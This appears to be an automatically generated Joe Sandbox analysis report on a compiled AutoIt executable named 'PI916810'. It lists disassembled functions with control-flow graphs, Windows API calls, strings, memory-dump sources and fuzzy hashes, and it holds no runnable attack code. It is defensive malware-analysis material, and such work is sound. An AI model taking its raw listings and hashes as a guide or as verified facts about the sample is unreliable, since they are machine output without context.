                                                                                                                                                                              • Part of subcall function 00463A58: RegisterClassExW.USER32(?), ref: 00463B28
                                                                                                                                                                              • Part of subcall function 004639E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00463A15
                                                                                                                                                                              • Part of subcall function 004639E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00463A36
                                                                                                                                                                              • Part of subcall function 004639E7: ShowWindow.USER32(00000000,?,?), ref: 00463A4A
                                                                                                                                                                              • Part of subcall function 004639E7: ShowWindow.USER32(00000000,?,?), ref: 00463A53
                                                                                                                                                                              • Part of subcall function 004643DB: _memset.LIBCMT ref: 00464401
                                                                                                                                                                              • Part of subcall function 004643DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004644A6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%O
                                                                                                                                                                            • API String ID: 529118366-1310891252
                                                                                                                                                                            • Opcode ID: de8cdb123d8d74d939063bb0bf197b5b1f5dc238dbf9903b70bf5defa03c506a
                                                                                                                                                                            • Instruction ID: 9827e058ce058d74cb4f41b93b0e3bbb2b1772afaf0c7195f88f4faaa1ea7dc9
                                                                                                                                                                            • Opcode Fuzzy Hash: de8cdb123d8d74d939063bb0bf197b5b1f5dc238dbf9903b70bf5defa03c506a
                                                                                                                                                                            • Instruction Fuzzy Hash: 76512A35D04288EADF11EFB1DC45DEE7F74AF55308B00407BF81166292EA78564AD72B
                                                                                                                                                                            Function 00464FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 983 464fe9-465001 CreateStreamOnHGlobal 984 465003-46501a FindResourceExW 983->984 985 465021-465026 983->985 986 49dd5c-49dd6b LoadResource 984->986 987 465020 984->987 986->987 988 49dd71-49dd7f SizeofResource 986->988 987->985 988->987 989 49dd85-49dd90 LockResource 988->989 989->987 990 49dd96-49ddb4 989->990 990->987
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00464EEE,?,?,00000000,00000000), ref: 00464FF9
                                                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00464EEE,?,?,00000000,00000000), ref: 00465010
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00464EEE,?,?,00000000,00000000,?,?,?,?,?,?,00464F8F), ref: 0049DD60
                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00464EEE,?,?,00000000,00000000,?,?,?,?,?,?,00464F8F), ref: 0049DD75
                                                                                                                                                                            • LockResource.KERNEL32(NF,?,?,00464EEE,?,?,00000000,00000000,?,?,?,?,?,?,00464F8F,00000000), ref: 0049DD88
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                            • String ID: SCRIPT$NF
                                                                                                                                                                            • API String ID: 3051347437-2107461305
                                                                                                                                                                            • Opcode ID: c10911e3353f64e1e0a5b99f0df0bffbf1084b9651bc703a9ce25aa13386a674
                                                                                                                                                                            • Instruction ID: 896ee832c28f03d4d34db81621604dac219b9b44baf343bdfe2d7d9b29dd442a
                                                                                                                                                                            • Opcode Fuzzy Hash: c10911e3353f64e1e0a5b99f0df0bffbf1084b9651bc703a9ce25aa13386a674
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A117075200741BFD7218B65EC98F677BB9EBC9B11F20417DF505CA260EB72EC048665
                                                                                                                                                                            Function 00464AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1047 464afe-464b5e call 4677c7 GetVersionExW call 467d2c 1052 464b64 1047->1052 1053 464c69-464c6b 1047->1053 1055 464b67-464b6c 1052->1055 1054 49db90-49db9c 1053->1054 1056 49db9d-49dba1 1054->1056 1057 464b72 1055->1057 1058 464c70-464c71 1055->1058 1060 49dba3 1056->1060 1061 49dba4-49dbb0 1056->1061 1059 464b73-464baa call 467e8c call 467886 1057->1059 1058->1059 1069 49dc8d-49dc90 1059->1069 1070 464bb0-464bb1 1059->1070 1060->1061 1061->1056 1063 49dbb2-49dbb7 1061->1063 1063->1055 1065 49dbbd-49dbc4 1063->1065 1065->1054 1067 49dbc6 1065->1067 1071 49dbcb-49dbce 1067->1071 1072 49dca9-49dcad 1069->1072 1073 49dc92 1069->1073 1070->1071 1074 464bb7-464bc2 1070->1074 1075 464bf1-464c08 GetCurrentProcess IsWow64Process 1071->1075 1076 49dbd4-49dbf2 1071->1076 1081 49dc98-49dca1 1072->1081 1082 49dcaf-49dcb8 1072->1082 1077 49dc95 1073->1077 1078 49dc13-49dc19 1074->1078 1079 464bc8-464bca 1074->1079 1083 464c0d-464c1e 1075->1083 1084 464c0a 1075->1084 1076->1075 1080 49dbf8-49dbfe 1076->1080 1077->1081 1089 49dc1b-49dc1e 1078->1089 1090 49dc23-49dc29 1078->1090 1085 464bd0-464bd3 1079->1085 1086 49dc2e-49dc3a 1079->1086 1087 49dc08-49dc0e 1080->1087 1088 49dc00-49dc03 1080->1088 1081->1072 1082->1077 1091 49dcba-49dcbd 1082->1091 1092 464c20-464c30 call 464c95 1083->1092 1093 464c89-464c93 GetSystemInfo 1083->1093 1084->1083 1094 49dc5a-49dc5d 1085->1094 1095 464bd9-464be8 1085->1095 1097 49dc3c-49dc3f 1086->1097 1098 49dc44-49dc4a 1086->1098 1087->1075 1088->1075 1089->1075 1090->1075 1091->1081 1104 464c32-464c3f call 464c95 1092->1104 1105 464c7d-464c87 GetSystemInfo 1092->1105 1096 464c56-464c66 1093->1096 1094->1075 1103 49dc63-49dc78 1094->1103 1100 49dc4f-49dc55 1095->1100 1101 464bee 1095->1101 1097->1075 1098->1075 1100->1075 1101->1075 1106 49dc7a-49dc7d 1103->1106 1107 49dc82-49dc88 1103->1107 1112 464c76-464c7b 1104->1112 1113 464c41-464c45 GetNativeSystemInfo 1104->1113 1108 464c47-464c4b 1105->1108 1106->1075 1107->1075 1108->1096 1111 464c4d-464c50 FreeLibrary 1108->1111 1111->1096 1112->1113 1113->1108
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00464B2B
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,004EFAEC,00000000,00000000,?), ref: 00464BF8
                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00464BFF
                                                                                                                                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00464C45
                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00464C50
                                                                                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00464C81
                                                                                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00464C8D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1986165174-0
                                                                                                                                                                            • Opcode ID: 0b9e53b2f0d86d27a7cec4b9fa2edd60ff14cbcb4c974e0e5c5e7751c06c67cb
                                                                                                                                                                            • Instruction ID: 2b426e12eb1b80e608e27a9d20a68563e8952f13792381ba343686c9b6a11d82
                                                                                                                                                                            • Opcode Fuzzy Hash: 0b9e53b2f0d86d27a7cec4b9fa2edd60ff14cbcb4c974e0e5c5e7751c06c67cb
                                                                                                                                                                            • Instruction Fuzzy Hash: FC91B57194A7C4DECF31DB6885511ABBFE4AF66300B48496FD0CA57B01E228F948C76E
                                                                                                                                                                            Function 0046FE40 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharUpper
                                                                                                                                                                            • String ID: prR$%O
                                                                                                                                                                            • API String ID: 3964851224-4230680911
                                                                                                                                                                            • Opcode ID: 18e00033d12e804178e768e4f9915436a99251645c4c5c74c744c6f164ba300f
                                                                                                                                                                            • Instruction ID: cd88f884bdfba103cb29f853fdace8ce1716fa6de9cfb843f331278e69618226
                                                                                                                                                                            • Opcode Fuzzy Hash: 18e00033d12e804178e768e4f9915436a99251645c4c5c74c744c6f164ba300f
                                                                                                                                                                            • Instruction Fuzzy Hash: E0925774609341CFD724DF15C480B6BB7E1BB85308F14896EE88A8B352D7B9EC45CB9A
                                                                                                                                                                            Function 0046E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: DtR$DtR$DtR$DtR$Variable must be of type 'Object'.
                                                                                                                                                                            • API String ID: 0-3694267590
                                                                                                                                                                            • Opcode ID: 3c9a166c27ee03925e96312bd3cfbbc6118039c5a8c1e0c437fd048adb695f4f
                                                                                                                                                                            • Instruction ID: c99c67808c56763ac508ee8b0cf2f54a7311e478c9e1004d4332249e85ba3f61
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c9a166c27ee03925e96312bd3cfbbc6118039c5a8c1e0c437fd048adb695f4f
                                                                                                                                                                            • Instruction Fuzzy Hash: B6A28F78A04205CFCB24CF59C480AAEB7F1FF59304F24805BE915AB351E779AD46CB9A
                                                                                                                                                                            Function 004C4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,0049E7C1), ref: 004C46A6
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 004C46B7
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004C46C7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 48322524-0
                                                                                                                                                                            • Opcode ID: 888e338a90fdee0fbd6ba4ee5f60da6f5aace67b03ee65db4bf60563dbf668ba
                                                                                                                                                                            • Instruction ID: 8434748be16112f294d8dd0812e849240e77bc161dc5b32c261c544f6f3b8979
                                                                                                                                                                            • Opcode Fuzzy Hash: 888e338a90fdee0fbd6ba4ee5f60da6f5aace67b03ee65db4bf60563dbf668ba
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EE0D8359105005B42106738EC9D8EB775C9F46335F10076AFD35C11E0E7B85D54859E
                                                                                                                                                                            Function 00470B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00470BBB
                                                                                                                                                                            • timeGetTime.WINMM ref: 00470E76
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00470FB3
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00470FC7
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00470FD5
                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00470FDF
                                                                                                                                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 0047105A
                                                                                                                                                                            • DestroyWindow.USER32 ref: 00471066
                                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00471080
                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 004A52AD
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 004A608A
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 004A6098
                                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004A60AC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                                                                                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prR$prR$prR$prR
                                                                                                                                                                            • API String ID: 4003667617-1203703131
                                                                                                                                                                            • Opcode ID: e1ab7b5bd32d377466e750f1839285c3496d7f87a7c0c31d4a78978dc62351b1
                                                                                                                                                                            • Instruction ID: 6251d9f0c581585ce7535be803a8cebb42260b831dc644673e2aa3a4b8fff6bb
                                                                                                                                                                            • Opcode Fuzzy Hash: e1ab7b5bd32d377466e750f1839285c3496d7f87a7c0c31d4a78978dc62351b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 50B2A070608741DFD724DF24C984BAAB7E4BF95308F14891FE489972A1DB78E845CB8B
                                                                                                                                                                            Function 004C93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004C91E9: __time64.LIBCMT ref: 004C91F3
                                                                                                                                                                              • Part of subcall function 00465045: _fseek.LIBCMT ref: 0046505D
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004C94BE
                                                                                                                                                                              • Part of subcall function 0048432E: __wsplitpath_helper.LIBCMT ref: 0048436E
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004C94D1
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004C94E4
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004C9509
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004C951F
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004C9532
                                                                                                                                                                              • Part of subcall function 004C922F: _memmove.LIBCMT ref: 004C9268
                                                                                                                                                                              • Part of subcall function 004C922F: _memmove.LIBCMT ref: 004C9277
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004C9479
                                                                                                                                                                              • Part of subcall function 004C99BE: _wcscmp.LIBCMT ref: 004C9AAE
                                                                                                                                                                              • Part of subcall function 004C99BE: _wcscmp.LIBCMT ref: 004C9AC1
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004C96DC
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004C974F
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?), ref: 004C9785
                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004C979B
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C97AC
                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C97BE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1500180987-0
                                                                                                                                                                            • Opcode ID: fb67fc5d51c08dc67f35d1cd9525f7920c43328603c1dc4550a04747d35b960a
                                                                                                                                                                            • Instruction ID: cfd1facca5e6c2f35f64339caa1e96285fae988eb0c3de3ec2b6dc21e72ed7e9
                                                                                                                                                                            • Opcode Fuzzy Hash: fb67fc5d51c08dc67f35d1cd9525f7920c43328603c1dc4550a04747d35b960a
                                                                                                                                                                            • Instruction Fuzzy Hash: A2C13CB5E00219AACF61DF95CC85EDEB7BDAF44304F0040ABF609E6251EB749E448F69
                                                                                                                                                                            Function 00463015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 75windowregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00463074
                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 0046309E
                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004630AF
                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 004630CC
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004630DC
                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 004630F2
                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00463101
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                            • Opcode ID: 815aba9f587fac54762102565acfd688a80165c3154215454f41aa75857cc277
                                                                                                                                                                            • Instruction ID: 1596107a584c9f4e351e71abbe629cbdfdbe1543a86bff86983de73afaccebde
                                                                                                                                                                            • Opcode Fuzzy Hash: 815aba9f587fac54762102565acfd688a80165c3154215454f41aa75857cc277
                                                                                                                                                                            • Instruction Fuzzy Hash: 21315CB1841344EFDB50CFA4D884AD9BBF0FF09310F14816EE580EA2A1D3B6458ACF55
                                                                                                                                                                            Function 00463041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00463074
                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 0046309E
                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004630AF
                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 004630CC
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004630DC
                                                                                                                                                                            • LoadIconW.USER32(000000A9), ref: 004630F2
                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00463101
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                            • Opcode ID: 3288fc7ec5aaef90049c2f3831acb8954302e366a9640e50300c6cf4ffe4b023
                                                                                                                                                                            • Instruction ID: 3ebf342b2c5189ddf703f4bea364ffd74b8213349e75e951984f53e1868fac9e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3288fc7ec5aaef90049c2f3831acb8954302e366a9640e50300c6cf4ffe4b023
                                                                                                                                                                            • Instruction Fuzzy Hash: C721F7B1900248EFDB10DFA4EC88B9DBBF4FB09700F00812AF510AA2A1D7B545499F95
                                                                                                                                                                            Function 004671EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00464864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005262F8,?,004637C0,?), ref: 00464882
                                                                                                                                                                              • Part of subcall function 0048074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,004672C5), ref: 00480771
